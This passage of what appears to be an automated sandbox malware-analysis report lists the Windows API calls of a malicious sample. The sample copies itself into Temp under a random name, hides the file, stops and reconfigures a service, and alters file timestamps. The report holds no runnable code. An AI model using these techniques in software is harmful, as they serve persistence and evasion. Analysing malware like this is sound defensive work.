                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ComputerInformationNameVolumelstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID: 2$4941262305804196$C:\Windows\system32\$c
                                                                                                                                                                                                                                                      • API String ID: 96996548-2816264590
                                                                                                                                                                                                                                                      • Opcode ID: d84cf7e1718c1e54ac5a1dacb7e25b78403c8476962d3321682ff539aece8d81
                                                                                                                                                                                                                                                      • Instruction ID: 22708223c646a178d41bc95d92e2a0f814173ae4769f9c09350c61bb9050823e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d84cf7e1718c1e54ac5a1dacb7e25b78403c8476962d3321682ff539aece8d81
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90114F72A4121CBFDB01DBE8DC85EEEBBBCFB18344F140466F600E6041DB745A198B65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000,00000000), ref: 0040D0B1
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,0040D1D5,776AC310), ref: 0040D0DB
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D0E8
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040D11C
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080), ref: 0040D12E
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000007), ref: 0040D148
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesFilelstrlen$lstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 1691315094-628786359
                                                                                                                                                                                                                                                      • Opcode ID: 495355920ec7953673e0eef587f14138d5ede02e4b128155301275f2b9f1aee0
                                                                                                                                                                                                                                                      • Instruction ID: bba8a6c5f5bab5744c0c80198fd7e287e6b0401e6d4ca0dbf8b47a0fecc87264
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 495355920ec7953673e0eef587f14138d5ede02e4b128155301275f2b9f1aee0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D211E972904218EAEB209B94DC45BDD77ACDB05314F1044A6E940E7182D7F86BD98FA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413C25
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(0040D13D,40000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413C3D
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0040D13D,?,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413C6B
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413C7D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413CAB
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413CB2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 00413BD5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$ReadSizeWrite
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 1842372638-2091069259
                                                                                                                                                                                                                                                      • Opcode ID: c1c920c90bf58fdbc3e8cb355cb3d56a9521444a16e49114f34270d3f8be6db9
                                                                                                                                                                                                                                                      • Instruction ID: 8831f88d7733d5c323c613fc166e52a429560689813e7087c96eeecf3537979f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1c920c90bf58fdbc3e8cb355cb3d56a9521444a16e49114f34270d3f8be6db9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31AD72D00209BFDF119FA5CC84AEFBB78EB04355F10406AF510B2290E7345A92CBA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,ServicesActive,000F003F,00700D88,00000000,00405B21,00700D88,00000001,?,00405BAD), ref: 00413A2B
                                                                                                                                                                                                                                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,00405BAD), ref: 00413A45
                                                                                                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,00405BAD), ref: 00413A5B
                                                                                                                                                                                                                                                      • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00405BAD), ref: 00413A7B
                                                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00405BAD), ref: 00413A82
                                                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00405BAD), ref: 00413A89
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Service$CloseHandleOpen$ChangeConfigControlManager
                                                                                                                                                                                                                                                      • String ID: ServicesActive
                                                                                                                                                                                                                                                      • API String ID: 1149404821-3071072050
                                                                                                                                                                                                                                                      • Opcode ID: e339f78d4b0a7e80bd98c81ccaf5d6764f04251041539ca3299aa54bce896337
                                                                                                                                                                                                                                                      • Instruction ID: f0dc7679a38273aa7a14fa9322e6c16f7626b2359b715fcf80eadf06e85900ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e339f78d4b0a7e80bd98c81ccaf5d6764f04251041539ca3299aa54bce896337
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC0168752443947BCB115BB44C88EFF3F2C9F06393F0001A8F650B3281CE6946468339
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413AB3
                                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?,?,00407BCE,047E50D0,00408C5D,00408C5D,76AE8A60,00408C5D,?,00000000), ref: 00413AC4
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007D9,00408C5D), ref: 00413AFD
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413B40
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007D9,76AE8A60), ref: 00413B8E
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 00413BA5
                                                                                                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,00408C5D,76AE8A60,?), ref: 00413BBF
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00413BC6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$File$System$CloseCountCreateHandleTick
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1788265925-0
                                                                                                                                                                                                                                                      • Opcode ID: 62f3a8fd01e86ba9802440c37d62e379551f9e638d6293a371f93cda34054580
                                                                                                                                                                                                                                                      • Instruction ID: 6c0202463d9a12d9f3580f39e1f5b74af0f3cd93389b840999671226064c08cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62f3a8fd01e86ba9802440c37d62e379551f9e638d6293a371f93cda34054580
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C031B877A90318F2CB14B795AC43BDDB77DAF19324F41002BF601B50A0EBB496468B6D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 00405FD8
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00405FEB
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00405FFD
                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00406004
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00406010
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0040601B
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000001,00000001,00000080), ref: 00406034
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040603B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$DestroyEnableEnabledMessagePostProcessShowSleepThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1728564233-0
                                                                                                                                                                                                                                                      • Opcode ID: 47c4687bb97f38a7d82e6fed2abff5cd8377e49c14785139af8aabca3f8013d2
                                                                                                                                                                                                                                                      • Instruction ID: 5ce9f396147177345ac3bda0077170ccccec577589b9f7b93905b01a4a4ba7ac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47c4687bb97f38a7d82e6fed2abff5cd8377e49c14785139af8aabca3f8013d2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0012C31241114FBDB319B519D4DEAF3B7DEF86B11F4000A9FA02A6290CB795662CB7A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,0042B7F8,00000060), ref: 00422BB3
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,0042B7F8,00000060), ref: 00422C06
                                                                                                                                                                                                                                                      • GetCommandLineA.KERNEL32(?,0042B7F8,00000060), ref: 00422C9F
                                                                                                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00422CF3
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00422D16
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleModule$CommandInfoLineStartupVersion
                                                                                                                                                                                                                                                      • String ID: 5m
                                                                                                                                                                                                                                                      • API String ID: 2778164164-1963150287
                                                                                                                                                                                                                                                      • Opcode ID: 544791c77213106303abe15329d4be5378e9b9fc1e400ee312837e66c0c246e7
                                                                                                                                                                                                                                                      • Instruction ID: e61f031dfd1e6ee1ba070bf2223e8a7bfb6b0622ed2d9bb9f5bd357ba4bfd0df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 544791c77213106303abe15329d4be5378e9b9fc1e400ee312837e66c0c246e7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2341C670F00631AAD721AF76B90566E77A0AF04715FA0442FE405AB292EBBC9942CB5D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$gethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 826719543-0
                                                                                                                                                                                                                                                      • Opcode ID: 7231b53defef9bb744e4c9a9a3d516ed9fc0ef3e16fe81c510fceb1934fb8bdb
                                                                                                                                                                                                                                                      • Instruction ID: 49cc356f681f43e0345f39264a21fc1f5e604774ab5c518727903f99d3873967
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7231b53defef9bb744e4c9a9a3d516ed9fc0ef3e16fe81c510fceb1934fb8bdb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E212731A04744AFDB309BA4ED489EB7BA9AB09301B44057AE701F7121DB38A995C75E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000,00000000), ref: 0040D0B1
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrcpyA.KERNEL32(00000000,0040D1D5,776AC310), ref: 0040D0DB
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrlenA.KERNEL32(00000000), ref: 0040D0E8
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: lstrcatA.KERNEL32(00000000,.exe), ref: 0040D11C
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: SetFileAttributesA.KERNEL32(00000000,00000080), ref: 0040D12E
                                                                                                                                                                                                                                                        • Part of subcall function 0040D09A: SetFileAttributesA.KERNEL32(00000000,00000007), ref: 0040D148
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,C:\Windows\system32\), ref: 0040D18B
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D19C
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(0000005C,0042A3B0), ref: 0040D1B8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat$DirectoryWindowslstrcpy
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\$\
                                                                                                                                                                                                                                                      • API String ID: 2968102200-2806058128
                                                                                                                                                                                                                                                      • Opcode ID: 2ed7aec3453b3e2aff95835a4acf487c9ae87da3e95239a0db27f53eae31b2c8
                                                                                                                                                                                                                                                      • Instruction ID: 7a1d7f8a24643269cf3a04ab3bcaf447689481d6c68f54a33154304281eb3d5c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ed7aec3453b3e2aff95835a4acf487c9ae87da3e95239a0db27f53eae31b2c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F04471E083086ADB2097E09D0ABD677A85B14309F5404BAE9C5F11C5DEBC95CD8A19
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\zjisvko.exe,00000104,776AC310,00000000,0040DBDD), ref: 0040D7DF
